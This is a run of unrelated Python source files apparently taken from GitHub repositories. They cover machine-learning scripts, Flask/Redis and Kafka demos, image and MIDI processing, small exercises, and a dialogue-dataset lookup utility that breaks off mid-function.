test_poly = poly_reg.fit_transform(test_scaled)
test_poly = pd.DataFrame(test_poly)
test_pred = lin_reg_1.predict(test_poly)
test_pred = abs(test_pred)
ans = pd.DataFrame({'ID' : ID, 'Upvotes' : test_pred})
sub = ans.sort_values(by=['ID'])
print(sub)
file_name = '5-lasso__ts_{}__rs_{}__alpha_{}.csv'.format(ts,rs,alp)
sub.to_csv(file_name, index=False)
| smittal1995/Upvote-count | lasso.py | lasso.py | py | 2,390 | python | en | code | 0 | github-code | 36 |
37218399811 | from os import getenv
from minio import Minio
def get_s3_client():
endpoint = "{host}:{port}".format(
host = getenv("MINIO_HOST", "127.0.0.1"),
port = getenv("MINIO_PORT", "9000")
)
access_key = getenv("MINIO_ACCESS_KEY", "minioadmin")
secret_key = getenv("MINIO_SECRET_KEY", "minioadmin")
return Minio(
endpoint,
access_key,
secret_key,
secure = False
)
| parledoct/qbestdocks | src/common/resources/s3.py | s3.py | py | 441 | python | en | code | 0 | github-code | 36 |
16034426544 | import ablib
import time
#Check for Daisy-24 address
if ablib.existI2Cdevice(0,0x27):
i2c_address=0x27
else:
i2c_address=0x3F
lcd = ablib.Daisy24(0,i2c_address)
lcd.backlighton()
lcd.putstring("Hello World !")
while True:
i=0
while i<10:
i+=1
lcd.setcontrast(i)
time.sleep(0.1)
while i>0:
i-=1
lcd.setcontrast(i)
time.sleep(0.1)
| tanzilli/playground | python/daisy24/contrast.py | contrast.py | py | 355 | python | en | code | 58 | github-code | 36 |
16748045789 | import os
import pickle
from pathlib import Path
import numpy as np
import pandas as pd
import sklearn
import xgboost as xgb
class CapacityPredictionModel:
def __init__(self, classes=None, hyper_params=None):
"""set default hyper-parameters"""
if hyper_params is None:
self.hyper_params = {
"objective": "multi:softprob",
"learning_rate": 0.01,
"col_sample_bytree": 0.85,
"max_depth": 3,
"n_estimators": 256,
"verbosity": 0,
}
# definition of classification classes
self.classes = classes
# create xgb model
self.model = xgb.XGBClassifier(kwargs=self.hyper_params)
def train(self, train_x, train_y, val_x, val_y):
"""train model"""
self.model.fit(
train_x,
train_y,
eval_set=[(train_x, train_y), (val_x, val_y)],
verbose=False,
)
def predict(self, x):
# find best iteration (on validation set)
best_iter = int(
np.argmin(self.model.evals_result()["validation_1"]["mlogloss"])
)
# predict classes
y_pred = self.model.predict(x, ntree_limit=best_iter)
y_pred = pd.DataFrame(y_pred.flatten(), index=x.index)[0]
# predict probabilities
y_pred_prob = self.model.predict_proba(x)
y_pred_prob = pd.DataFrame(y_pred_prob, index=x.index)
return y_pred, y_pred_prob
def evaluate(self, x, y_true):
scores = {}
# predict on x
y_pred, _ = self.predict(x)
# compute f1 score
scores["f1"] = sklearn.metrics.f1_score(
y_true.values,
y_pred.values.flatten(),
average="weighted",
labels=np.unique(y_pred.values.flatten()),
)
# compute accuracy score
scores["accuracy"] = sklearn.metrics.accuracy_score(
y_true.values, y_pred.values.flatten()
)
return scores
def save(self, directory):
# check directory
if not os.path.exists(directory):
os.makedirs(directory, exist_ok=True)
# save model
with open(directory / "model.pkl", "wb") as fh:
pickle.dump(self.model, fh)
# save classes
with open(directory / "classes.pkl", "wb") as fh:
pickle.dump(self.classes, fh)
def load(self, directory):
# load model
model_file = Path(directory) / "model.pkl"
with open(model_file, "rb") as fh:
self.model = pickle.load(fh)
# load classes
classes_file = Path(directory) / "classes.pkl"
with open(classes_file, "rb") as fh:
self.classes = pickle.load(fh)
| AlexisMignon/openstf | openstf/model/capacity/model.py | model.py | py | 2,790 | python | en | code | null | github-code | 36 |
756466471 | import argparse
import time
from utils import load_weights, read_mnist, preprocessing_data
from sklearn.metrics import classification_report
from my_svm import MySvm
def parse_args():
path_to_x_test = 'samples/t10k-images-idx3-ubyte.gz'
path_to_y_test = 'samples/t10k-labels-idx1-ubyte.gz'
path_to_model = 'samples/my_model'
parser = argparse.ArgumentParser()
parser.add_argument('-x', '--x_test_dir', default=path_to_x_test,
help=f'path to the file with the testing sample\'s records, '
f'default: {path_to_x_test}')
parser.add_argument('-y', '--y_test_dir', default=path_to_y_test,
help=f'path to the file with the testing sample\'s labels, '
f'default: {path_to_y_test}')
parser.add_argument('-m', '--model_input_dir', default=path_to_model,
help='path to the file for loading model, '
f'default: {path_to_model}')
parser.add_argument('-k', '--kernel', default='poly',
help='kernel function: \'linear\' or \'poly\', default: \'poly\'')
return parser.parse_args()
def main():
args = parse_args()
path_to_x_test = args.x_test_dir
path_to_y_test = args.y_test_dir
path_to_model = args.model_input_dir
kernel = args.kernel
X_original = read_mnist(path_to_x_test)
X_test, image_shape = preprocessing_data(X_original)
y_test = read_mnist(path_to_y_test)
weights = load_weights(path_to_model)
clf = MySvm(kernel_type=kernel, image_shape=image_shape)
clf.load_weights(weights)
predict_labels = clf.predict(X_test)
print('Metrics on the test data:\n')
print(classification_report(y_test, predict_labels, digits=4))
if __name__ == "__main__":
start_time = time.time()
main()
exec_time = time.time() - start_time
print(f'\n\nExecution time: {exec_time//60:5.0f} min, {exec_time%60:1.3} sec\n')
| albellov/mrg_mlcourse_module1 | predict.py | predict.py | py | 1,990 | python | en | code | 1 | github-code | 36 |
38676312464 | import matplotlib.pyplot as plt
import numpy as np
import python.results.values as v
import python.tools as tools
import python.argumets as a
import python.embeddings as emb
import os
# Parametros como estan ahorita.
TUPLE_SIZE = 2 # 3 This is r.
COOCURRENCE_THRESHOLDS = 0.02 # 0.03
OVERLAP = 0.9
MIN_CLUSTER_SIZE = 5 # 10
TOP_TOPIC_WORDS = 10
fileName = v.fileName
x_graph = [] # Los valores de x de la grafica (los topicN de los que si tenemos history)
y_graph_train = [] # Los valores de y de la grafica
y_graph_val = [] # Los valores de y de la grafica
histories_list = [] # los nombres de los PickleFile que contienen la historia de entrenamiento
# Recorremos el directorio *history* para ver cuales modelos hemos entrenado
dirsHist = os.listdir( 'history' )
# Para cada topicN_ encontramos una historia de entrenmiento y los agregamos a las listas (si hay hist.)
for topicN_ in v.x_values:
extension = getSMHextension(embType='', tupSize=TUPLE_SIZE, coo=COOCURRENCE_THRESHOLDS,
overlap=OVERLAP, minClustS=MIN_CLUSTER_SIZE, topicN=topicN_)
listDirs = filter(lambda x : extension in x, dirsHist )
if listDirs :
historyDir = listDirs[-1]
x_graph.append(topicN_)
histories_list.append(historyDir)
# Para cada history de entrenamiento, calculamos el accuracy promedio de las ultimas 5 epocas,
# y agregamos el valor a y_graph
for file in histories_list:
a = tools.loadPickle(file)
ac = a['acc'][-5:]
train_acc = sum(ac)/len(ac)
y_graph_train.append(train_acc)
vac = a['val_acc'][-5:]
val_acc = sum(vac)/len(vac)
y_graph_val.append(val_acc)
# Ya tenemos el acc y val_acc de los entrenamientos
# Crear grafica
| marshsh/Word-Embeddings | python/results/graph_smh_reducedTopicN.py | graph_smh_reducedTopicN.py | py | 1,669 | python | es | code | 0 | github-code | 36 |
34023322627 | import PIL.Image
import os
def resize_image(image_path, new_width, new_height):
"""Resizes an image without changing its dimensions.
Args:
image_path: The path to the image file.
new_width: The new width of the image.
new_height: The new height of the image.
Returns:
The resized image.
"""
image = PIL.Image.open(image_path)
width, height = image.size
aspect_ratio = width / height
new_width = int(new_width * aspect_ratio)
new_height = int(new_height * aspect_ratio)
resized_image = image.thumbnail((new_width, new_height), PIL.Image.ANTIALIAS)
return image
def crop_Image(img_path, save_path):
image = PIL.Image.open(img_path)
image.crop((0, 0, image.width, image.width)).save(save_path)
if __name__ == "__main__":
H = 300
W = 300
resized_image = resize_image("res/thumbnail/2104007_ete_21.png", 300, 300).save(
"res/thumbnail/2104007_ete_21.png"
)
# resized_image.save("resized_image.jpg")
for img in os.listdir("res/thumbnail"):
image_path = f"res/thumbnail/{img}"
# resize_image(image_path, W, H).save(image_path)
crop_Image(image_path, image_path)
print(f"Cropped {image_path} and saved at {image_path}")
| dev5h/ete21 | resize_thumbnails.py | resize_thumbnails.py | py | 1,264 | python | en | code | 0 | github-code | 36 |
9200352322 | import torch
print("\n---First example---")
x = torch.ones(2, 2, requires_grad=True)
y = x + 2
z = y * y * 3
out = z.mean()
out.backward()
print("x.grad:", x.grad)
# # ----- ----- ----- -----
# # alternative: comment previous backward() and x.grad references
# print("x.grad alternative:", torch.autograd.grad(outputs=out, inputs=x))
# # ----- ----- ----- -----
# ----- ----- ----- -----
# Neural network example
# ----- ----- ----- -----
print("\n---Neural network example---")
x = torch.ones(8) # input tensor
y = torch.zeros(10) # expected output
W = torch.randn(8, 10, requires_grad=True) # weights
b = torch.randn(10, requires_grad=True) # bias vector
z = torch.matmul(x, W)+b # output
loss = torch.nn.functional.binary_cross_entropy_with_logits(z, y)
loss.backward()
# print(W.grad) #OK
print("b.grad:", b.grad) #OK
print("x.grad:",x.grad)
print("y.grad:",y.grad)
# print(z.grad) # WARNING
# print(loss.grad) # WARNING
# ----- ----- ----- -----
# Vector-Jacobian example #1
# ----- ----- ----- -----
print("\n---Vector-Jacobian example #1---")
x = torch.rand(3, requires_grad=True)
y = x + 2
# y.backward() <---
# RuntimeError: grad can be implicitly
# created only for scalar outputs
# try ---> y.backward(v) where v is any tensor of length 3
# v = torch.rand(3)
v = torch.tensor([1.,2,3])
y.backward(v)
print("x.grad:", x.grad)
# # ----- ----- ----- -----
# # alternative: comment previous backward() and x.grad references
# print("x.grad alternative:",torch.autograd.grad(outputs=y, inputs=x, grad_outputs=v))
# # ----- ----- ----- -----
# ----- ----- ----- -----
# Vector-Jacobian example #2
# ----- ----- ----- -----
print("\n---Vector-Jacobian example #2---")
x = torch.tensor([1., 2], requires_grad=True)
print('x:', x)
y = torch.empty(3)
y[0] = x[0]**2
y[1] = x[0]**2 + 5*x[1]**2
y[2] = 3*x[1]
print('y:', y)
v = torch.tensor([1., 1, 1,])
y.backward(v)
print('x.grad:', x.grad)
# ----- ----- ----- -----
# Vector-Jacobian example #2
# ----- ----- ----- -----
print("\n---General case example---")
x = torch.tensor([[1.,2,3],[4,5,6]], requires_grad=True)
y = torch.log(x)
# y is a 2x2 tensor obtained by taking logarithm entry-wise
v = torch.tensor([[3.,2,0],[4,0,1]], requires_grad=True)
# v is not a 1D tensor!
y.backward(v)
print("x.grad:", x.grad) # returns dl/dx, as evaluated by "matrix-Jacobian" product v * dy/dx
# therefore we can interpret v as a matrix dl/dy
# for which the chain rule expression dl/dx = dl/dy * dy/dx holds. | antonio-f/pytorch_backward_function | backward_examples.py | backward_examples.py | py | 2,586 | python | en | code | 0 | github-code | 36 |
44602191475 | # -*- coding: utf-8 -*-
"""
Задание 6.1
Список mac содержит MAC-адреса в формате XXXX:XXXX:XXXX
Однако, в оборудовании cisco MAC-адреса используются в формате XXXX.XXXX.XXXX
Написать код, который преобразует MAC-адреса в формат cisco
и добавляет их в новый список mac_cisco
Ограничение: Все задания надо выполнять используя только пройденные темы.
"""
mac_cisco = [] # создаем новый список маков
for mac_item in mac: # добавляем элементы в новый список
mac_cisco.append(mac_item.replace(':', '.'))
print(mac_cisco) # вывод нового списка
| kubuz-o/PYNENG | exercises/06_control_structures/task_6_1.py | task_6_1.py | py | 828 | python | ru | code | 0 | github-code | 36 |
10410217579 | import json
import random
from pykafka import KafkaClient
from datetime import datetime
import time
from faker import Faker
CONS_KAFKA_TOPIC = "test-demand3"
CONS_KAFKA_SERVER = "localhost:9092"
#creating instances of Kafka variables
kafka_client = KafkaClient(CONS_KAFKA_SERVER)
kafka_topic = kafka_client.topics[CONS_KAFKA_TOPIC]
producer = kafka_topic.get_producer()
consumer = kafka_topic.get_simple_consumer()
#initializing necessary variables
captain_data = {}
user_data = {}
id = [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20]
age = [21,20,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40]
fake = Faker()
#making a list of latitudes and longitudes taken from geojson and stored in demand_supply.json
with open('demand_supply.json') as f:
json_array = json.load(f)
coordinates = json_array['coordinates']
#generates captain data and produces to the demand_supply topic every 1 minute
def gen_captain_data():
i = 0
while i<50:
captain_data['capId'] = random.choice(id)
captain_data['name'] = fake.name()
captain_data['email'] = fake.email()
captain_data['age'] = random.choice(age)
captain_data['event-type'] = 'captain'
coordinate = random.choice(coordinates)
captain_data['lat'] = coordinate[0]
captain_data['long'] = coordinate[1]
captain_data['timestamp'] = str(datetime.utcnow())
mssg = json.dumps(captain_data)
producer.produce(mssg.encode('ascii'))
i += 1
#time.sleep(4)
#generates user data and produces to the demand_supply topic every 2 minutes
def gen_user_data():
j = 0
while j<40:
user_data['userId'] = random.choice(id)
user_data['name'] = fake.name()
user_data['email'] = fake.email()
user_data['age'] = random.choice(age)
user_data['event-type'] = 'user'
coordinate = random.choice(coordinates)
user_data['lat'] = coordinate[0]
user_data['long'] = coordinate[1]
user_data['timestamp'] = str(datetime.utcnow())
msg = json.dumps(user_data)
producer.produce(msg.encode('ascii'))
j += 1
#time.sleep(10)
if __name__ == '__main__':
gen_captain_data()
gen_user_data()
for message in consumer:
print(f"{message.offset}: {message.value}")
| ayushmanadhikari/kafka-basics | pykafka-dir/demand_supply.py | demand_supply.py | py | 2,341 | python | en | code | 0 | github-code | 36 |
32882318710 | # -*- coding: utf-8 -*-
"""
Created on Sun Jun 28 21:01:17 2020
@author: Hemakshi Pandey
"""
# NLP with BAG OF MODEL using SUPPORT VECTOR MACHINE
## Importing the libraries
import numpy as np
#NumPy is a python library used for working with arrays.
import pandas as pd
#They are used in Python to deal with data analysis and manipulation. To put it in simpler words, Pandas help us to organize data and manipulate the data by putting it in a tabular form.
import nltk
# NLTK is a leading platform for building Python programs to work with human language data.
import pickle
#Comes handy to save complicated data.Python pickle module is used for serializing and de-serializing python object structures.
import re
#This module provides regular expression matching operations
from nltk.corpus import stopwords
nltk.download('stopwords')
# One of the major forms of pre-processing is to filter out useless data.
#In natural language processing, useless words (data), are referred to as stop words.
nltk.download('wordnet')
wnlem = nltk.WordNetLemmatizer()
#Lemmatization, unlike Stemming, reduces the inflected words properly ensuring that the root word belongs to the language.
nltk.download('punkt')
#This tokenizer divides a text into a list of sentences, by using an unsupervised algorithm to build a model for abbreviation words, collocations, and words that start sentences.
"""## Importing the dataset"""
dataset = pd.read_csv('Final_IPC_label_data.csv') # This data contains the labelled definitions of IPC 302,307 and 376
dataset.head() #The head() function is used to get the first n rows.
"""## Cleaning the texts"""
corpus = [] # defining a list of corpus
for i in range(0, 578): # the loop for traversing through the rows
definition = re.sub('[^a-zA-Z]', ' ', dataset['Definition'][i]) # the operation takes input of all word including alphabet
definition = definition.lower() # converts that into lower case (normalization and cleaning)
definition = definition.split() #split() method returns a list of strings after breaking the given string by the specified separator.
wnlem = nltk.WordNetLemmatizer() #brings context to the words.
all_stopwords = stopwords.words('english') #useless words (data), are referred to as stop words.
definition = [wnlem.lemmatize(word) for word in definition if not word in set(all_stopwords)] # traversing through the words and normalizing it
definition = ' '.join(definition) #Join all items in a tuple into a string, using a space (' ') character as separator:
corpus.append(definition) # filtered definition are added to the list
print(corpus)
"""## Creating the Bag of Words model"""
from sklearn.feature_extraction.text import CountVectorizer #Convert a collection of text words to a matrix of token counts
cv = CountVectorizer( max_features = 620)
#With CountVectorizer we are converting raw text to a numerical vector representation of words.
#This makes it easy to directly use this representation as features in Machine Learning tasks such as for text classification and clustering.
X = cv.fit_transform(corpus).toarray() #one step fit tranform
#Here the fit method, when applied to the training dataset,learns the model parameters (for example, mean and standard deviation).
#We then need to apply the transform method on the training dataset to get the transformed (scaled) training dataset.
y = dataset.iloc[:, -1].values
len(X[0])
"""## Splitting the dataset into the Training set and Test set"""
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.20, random_state = 0)
"""## Training the Support Vector Machine model on the Training set"""
from sklearn.svm import SVC
classifier = SVC(kernel = 'linear', random_state = 0)
classifier.fit(X_train, y_train)
"""## Predicting the Test set results"""
y_pred = classifier.predict(X_test)
print(np.concatenate((y_pred.reshape(len(y_pred),1), y_test.reshape(len(y_test),1)),1))
"""## Making the Confusion Matrix"""
from sklearn.metrics import confusion_matrix, accuracy_score
cm = confusion_matrix(y_test, y_pred)
print(cm)
accuracy_score(y_test, y_pred)
# Saving our classifier
with open('C:/DEPLOYMENT/SVMclassifier.pkl','wb') as model_SVM_pkl:
pickle.dump(classifier,model_SVM_pkl)
# Saving the BAG OF WORDS model
with open('C:/DEPLOYMENT/bagofwordsmodel.pkl','wb') as model_BOW_pkl:
pickle.dump(cv,model_BOW_pkl)
| hemakshi1234/NCRB_Automatic-IPC-Section-classification | flask_NLP_predict_train.py | flask_NLP_predict_train.py | py | 4,502 | python | en | code | 2 | github-code | 36 |
9786554436 | """
文件夹的相关操作
创建
获取当前目录
改变默认目录
获取目录列表
删除文件夹
"""
import os
# 创建文件夹
# os.mkdir("zhangsan")
# 获取当前的目录
dir = os.getcwd()
print("当前的目录: ", dir)
# 改变默认目录
# os.chdir("../")
# 获取目录列表
dirList = os.listdir("./")
for dir in dirList:
print(dir)
# 删除文件夹
os.rmdir("zhangsan")
| ilaoda/python | 07_文件操作/07_6_文件夹的相关操作.py | 07_6_文件夹的相关操作.py | py | 433 | python | zh | code | 0 | github-code | 36 |
6035629289 | import cv2
import numpy as np
from math import exp, pow
FILENAME = "testbaby"
SIZE = 200
OBJCOLOR, BKGCOLOR = (0, 0, 255), (0, 255, 0)
SOURCE, SINK = -2, -1
def read_cuts(filename, image):
with open(filename, "r") as f:
lines = f.readlines()
mf = int(lines[0])
idx = 0
for char in lines[1]:
if idx >= SIZE*SIZE:
break
r, c = idx // SIZE, idx % SIZE
idx += 1
if char == '0':
# attached to sink
image[r][c] = (0, 0, 255)
else:
# attached to source
image[r][c] = (0, 255, 0)
image = cv2.imread("{}.jpg".format(FILENAME), cv2.IMREAD_GRAYSCALE)
image = cv2.resize(image, (SIZE, SIZE))
seeded_image = cv2.imread("{}seeded.jpg".format(FILENAME), cv2.IMREAD_COLOR)
seeded_image = cv2.resize(seeded_image, (SIZE, SIZE), interpolation=cv2.INTER_NEAREST)
unresized_seeded = cv2.resize(seeded_image, (SIZE*10, SIZE*10), interpolation=cv2.INTER_NEAREST)
V = image.size + 2
graph = np.zeros((V, V), dtype="int32")
cuts = read_cuts("graph_output.txt".format(FILENAME), seeded_image)
cv2.imshow("image", image)
cv2.imshow("seeded image", seeded_image)
cv2.imshow("unresized seeded image", unresized_seeded)
cv2.waitKey(0)
| 2022tgoel/6.854-Final-Project | cut_renderer.py | cut_renderer.py | py | 1,292 | python | en | code | 0 | github-code | 36 |
769211687 | import glob
from music21 import converter, instrument, note, chord
def get_notes():
""" Get all the notes and chords from the midi files in the ./midi_songs directory """
notes = []
for file in glob.glob("rammstein/*.mid*"):
midi = converter.parse(file)
print("Parsing %s" % file)
notes_to_parse = None
try: # file has instrument parts
s2 = instrument.partitionByInstrument(midi)
notes_to_parse = s2.parts[0].recurse()
except: # file has notes in a flat structure
notes_to_parse = midi.flat.notes
notes.extend(parse_notes(notes_to_parse))
return notes
def parse_notes(notes_to_parse):
notes = []
for element in notes_to_parse:
if isinstance(element, note.Note):
notes.append(parse_note(element))
elif isinstance(element, chord.Chord):
notes.append(parse_chord(element))
elif isinstance(element, note.Rest):
notes.append(parse_rest(element))
return notes
def parse_note(element):
pitch = str(element.pitch)
duration = element.duration.type
return [pitch, duration]
def parse_chord(element):
pitch = '.'.join(str(n.pitch) for n in element.notes)
duration = element.duration.type
return [pitch, duration]
def parse_rest(element):
pitch = element.name
duration = element.duration.type
return [pitch, duration] | tanelxen/riff-composer | get_notes.py | get_notes.py | py | 1,486 | python | en | code | 0 | github-code | 36 |
41654793539 | import numpy as np
def IsInCollision(x,obc):
size = [[5, 5, 10], [5, 10, 5], [5, 10, 10], [10, 5, 5], [10, 5, 10], [
10, 10, 5], [10, 10, 10], [5, 5, 5], [10, 10, 10], [5, 5, 5]]
s=np.zeros(3,dtype=np.float32)
s[0]=x[0] # point x coord
s[1]=x[1] # point y coord
s[2]=x[2] # point z coord
for i in range(0, len(obc)): # for 10 obstacles
colliding=True
for j in range(0,3):
if abs(obc[i][j] - s[j]) > size[i][j]/2.0 and s[j]<20.0 and s[j]>-20:
colliding=False
break
if colliding==True:
return True
return False | MauriceChiu7/PURG-CS-593-ROB | Assignment3/MPNet-hw/plan_c3d.py | plan_c3d.py | py | 625 | python | en | code | 0 | github-code | 36 |
20319120410 | import flask
import flask_redis
import flask_socketio
import time
import threading
import json
redis_store = flask_redis.FlaskRedis()
socketio = flask_socketio.SocketIO()
def get_data_for_hashtag(tag):
return redis_store.lrange(tag, 0, 1000)
def broadcast_thread():
while True:
# sleeping for 50ms
time.sleep(0.2)
# get all keys for datapoints:
keys = redis_store.keys(pattern="points-*")
for k in keys:
category = k.decode("utf-8").partition('-')[2]
val = redis_store.lindex(k, 0)
socketio.emit('points', {"p": float(val)}, namespace="/{}".format(category))
def broadcast_mentions():
while True:
time.sleep(2)
keys = redis_store.keys(pattern="mentions-*")
for k in keys:
category = k.decode("utf-8").partition('-')[2]
if redis_store.llen(k) == 0:
continue
element = redis_store.lpop(k)
try:
jelement = json.loads(element)
except ValueError:
continue
socketio.emit('mentions'.format(k), jelement, namespace="/{}".format(category))
#, namespace="/{}".format(k)
def create_app():
app = flask.Flask(__name__)
redis_store.init_app(app)
socketio.init_app(app)
thread = threading.Thread(target=broadcast_thread)
thread.daemon = True
thread.start()
thread = threading.Thread(target=broadcast_mentions)
thread.daemon = True
thread.start()
return app
app = create_app()
@app.route("/")
def line():
left = {
"category": "ichackupper",
"data": get_data_for_hashtag("ichackupper")
}
right = {
"category": "ichacklower",
"data": get_data_for_hashtag("ichacklower")
}
return flask.render_template("index.html", left=left, right=right)
| thelinerocks/lineweb | app.py | app.py | py | 1,855 | python | en | code | 0 | github-code | 36 |
74230073703 | import asyncio
import os
from agconnect.common_server import AGCClient
from agconnect.common_server import CredentialParser
from agconnect.cloud_function import AGConnectFunction
AGCClient.initialize("real_cli",
credential=CredentialParser.to_credential(
(os.path.join(os.path.dirname(__file__), '[PATH]/agconnect_credentials.json'))))
agcFunction = AGConnectFunction.get_instance()
async def my_handler_test():
value = agcFunction.wrap("callback", "$latest")
value.set_timeout(20000)
test_str = "test s string"
res = await value.call(test_str)
print(f"res: {res.get_value()}")
buf = memoryview(bytearray(10))
res3 = await value.call(buf)
print(f"res2: {res3.get_value()}")
async def my_handler():
good_res = {'simple': 'example'}
test_str = "test s string"
res = await agcFunction.wrap("callback", "$latest").call(test_str)
print(f"res: {res.get_value()}")
assert res.get_value() == good_res
loop = asyncio.get_event_loop()
loop.run_until_complete(my_handler_test())
| AppGalleryConnect/agc-server-demos-python | cloudfunction/main.py | main.py | py | 1,075 | python | en | code | 0 | github-code | 36 |
12371036591 | #최소공배수
t = int(input())
max_num = 450001
def gcd(a, b):
mod = a%b
while mod > 0:
a = b
b = mod
mod = a%b
return b
for _ in range(t):
x, y = map(int, input().split())
under_gcd = gcd(x, y)
result = (x*y)//under_gcd
print(result) | hwangstone1/Algorithm_repository | Algorithm_math/math_exercise_7.py | math_exercise_7.py | py | 298 | python | en | code | 0 | github-code | 36 |
23211155458 | from math import fabs
from os.path import split
from re import sub
from utils.tools import addWordsToJieba, splitSentence
import ujson
import os
from utils.config import DATASET
import jieba
from io import BytesIO, StringIO
attraction_db_path = "attraction_db.json"
hotel_db_path = "hotel_db.json"
metro_db_path = "metro_db.json"
restaurant_db_path = "restaurant_db.json"
taxi_db_path = "taxi_db.json"
EntityIndex = 0
AttrsDictIndex = 1
#SPO_index satified MEMTOKEN
SUBJECT_INDEX=0
PREDICATE_INDEX=1
OBJECT_INDEX=2
"""
(subject-predicate-object(predicateInfo))
(entity-predicate-predicateInfo)
(subject-name-entity)
name is kind of predicate
entity is object
"""
SUBJECT_KEY = "领域"
ENTITIES_KEY = "名称"
SUBJECTS = ["景点", "酒店", "餐馆", "地铁", "出租"]
def getDictfromDataBase(filepath: str):
abspath = os.path.join(os.getcwd(), "data", DATASET, "database", filepath)
database_dict = None
with open(abspath,encoding='utf-8') as f:
database_dict = ujson.load(f)
return database_dict
# equals
# attraction_db = getDictfromDataBase(attraction_db_path)
# hotel_db = getDictfromDataBase(hotel_db_path)
# metro_db = getDictfromDataBase(metro_db_path)
# restaurant_db = getDictfromDataBase(restaurant_db_path)
# taxi_db = getDictfromDataBase()
dbs = [getDictfromDataBase(path) for path in iter((
attraction_db_path, hotel_db_path, metro_db_path, restaurant_db_path, taxi_db_path))]
# ChooseDataBaseBySubjectName = {SUBJECTS[i]: db for i,db in enumerate(dbs)}
ChooseDataBaseBySubjectName = dict()
for i, each in enumerate(SUBJECTS):
ChooseDataBaseBySubjectName.setdefault(each,dbs[i])
PREDICATES = {}
PREDICATES = {eachSubject: [key for key in ChooseDataBaseBySubjectName[
eachSubject][0][AttrsDictIndex].keys()] for eachSubject in SUBJECTS}
# for eachSubject in SUBJECTS:
# database = ChooseDataBaseBySubjectName[]
ENTITIES = []
ENTITIES_belongs_SUBJECTS={}
def initPredicate(dbs: tuple):
for eachSubject in SUBJECTS:
database = ChooseDataBaseBySubjectName[eachSubject]
attrsObj = database[0][AttrsDictIndex]
PREDICATES.setdefault(eachSubject,[])
for key in attrsObj.keys():
PREDICATES[eachSubject].append(key)
def initEntitiesAndEntities_belongs(dbs: tuple):
for index , database in enumerate(dbs):
for item in database:
ent = item[EntityIndex]
ENTITIES.append(ent)
ENTITIES_belongs_SUBJECTS.setdefault(ent,SUBJECTS[index])
initPredicate(dbs)
initEntitiesAndEntities_belongs(dbs)
# 避免jieba将数据集词拆分
# 读入却分词无效,jieba背锅
# dict_path = os.path.join(os.getcwd(), 'data', 'crossWOZ', 'dict.txt')
# if os.path.isfile(dict_path):
# with open(dict_path, "r+", encoding="utf8") as file:
# for each in SUBJECTS:
# file.writelines(' 3 n \n'.join(PREDICATES[each]))
# file.writelines(' 3 n \n'.join(SUBJECTS))
# file.writelines(' 3 n \n'.join(ENTITIES))
# jieba.load_userdict(file)
for each in SUBJECTS:
addWordsToJieba(PREDICATES[each])
addWordsToJieba(SUBJECTS)
addWordsToJieba(ENTITIES)
# def getSubjectByEntityThroughDBs(dbs: tuple, ent: str) -> str:
# for database in dbs:
# for item in database:
# if item[EntityIndex] is ent:
# return item[AttrsDictIndex][SUBJECT_KEY]
# return None
def getSubjectByEntity(ent: str) -> str:
return ENTITIES_belongs_SUBJECTS[ent]
def getAttrsByEntityThroughDBs(dbs: tuple, ent: str) -> dict:
for database in dbs:
for item in database:
if item[EntityIndex] is ent:
return item[AttrsDictIndex]
return None
def getAttrsByEntity(ent: str) -> dict:
database = ChooseDataBaseBySubjectName[ENTITIES_belongs_SUBJECTS[ent]]
for item in database:
if item[EntityIndex] == ent:
return item[AttrsDictIndex]
return None
def getEntitesBySPO(subject: str, predicate: str, predicateInfo: str):
database = ChooseDataBaseBySubjectName[subject]
entities = []
# entities = [item[EntityIndex] if item[AttrsDictIndex][predicate] is predicateInfo else None for item in database]
for item in database:
if item[AttrsDictIndex][predicate] is predicateInfo:
entities.append(item[EntityIndex])
return entities if len(entities)>0 else None
def getEntitesBySubject(subject: str)->list:
ents = []
for item in ChooseDataBaseBySubjectName[subject]:
ents.append(item[EntityIndex])
return ents if len(ents) else None
def getEntityAttrs(ent:str):
database = ChooseDataBaseBySubjectName[ENTITIES_belongs_SUBJECTS[ent]]
for item in database:
if item[EntityIndex] is ent:
return item[AttrsDictIndex]
def getEntitesAttrsBySubjectAndPredicate(subject: str, predicate: str)->dict:
database = ChooseDataBaseBySubjectName[subject]
# ENTITIES_Attrs = {item[EntityIndex]: {key: item[AttrsDictIndex][key]
# for key in item[AttrsDictIndex].keys()} if item is predicate else None for item in database}
ENTITIES_Attrs = {}
for item in database:
for key in item[AttrsDictIndex].keys():
if key is predicate:
ENTITIES_Attrs.setdefault(item[EntityIndex],item[AttrsDictIndex])
return ENTITIES_Attrs if len(ENTITIES_Attrs) else None
# def getEntitiesBySubjectAndInformPredicate(subject: str, predicate: str,inform_predicate) -> dict:
# database = ChooseDataBaseBySubjectName[subject]
# ENTITIES = []
# for item in database:
# if item[AttrsDictIndex][predicate] is inform_predicate:
# ENTITIES.append(item[EntityIndex])
# return ENTITIES if len(ENTITIES) else None
def findEntities(splitWords:list):
ents = []
for word in splitWords:
if ENTITIES.__contains__(word):
ents.append(word)
return ents if len(ents) else None
def findPredicatesBySubject(splitWords:list,subject:str):
predicates=[]
for word in splitWords:
if PREDICATES[subject].__contains__(word):
predicates.append(word)
return predicates if len(predicates) else None
def findPredicatesByEnt(splitWords:list,ent:str):
predicates = []
for word in splitWords:
if PREDICATES[ENTITIES_belongs_SUBJECTS[ent]].__contains__(word):
predicates.append(word)
return predicates if len(predicates) else None
def findSubjects(splitWords:list):
subjects = []
for word in splitWords:
if SUBJECTS.__contains__(word):
subjects.append(subjects)
return subjects if len(subjects) else None
def compareInfoEqual(wordlist, keys):
for word in wordlist:
for key in keys:
if word is key:
return True
return False
def wordListFindRequestPredicateInfo(wordlist, old_ents)->dict:
result =None
userWants = {}
subjects = findSubjects(wordlist)
inform_predicate = [findPredicatesBySubject(wordlist,subject) for subject in subjects]
ents = findEntities(wordlist)
if ents is None:
ents = old_ents
# if subjects:
# ents = getEntitesBySubject()
# for ent in ents:
# ents_info_list.append(ent)
if ents and inform_predicate:
userWants.setdefault(inform_predicate, [])
for ent in ents:
attrs = getAttrsByEntity(ent)
for word in wordlist:
for key, val in enumerate(attrs):
if word is val:
userWants[inform_predicate].append(ent[inform_predicate])
elif subjects and inform_predicate:
# user need ent
if ents:
userWants.setdefault(ENTITIES_KEY,[])
for ent in ents:
# attrs = getAttrsByEntity(ent)
predicates = PREDICATES[ENTITIES_belongs_SUBJECTS(ent)]
if compareInfoEqual(wordlist, predicates):
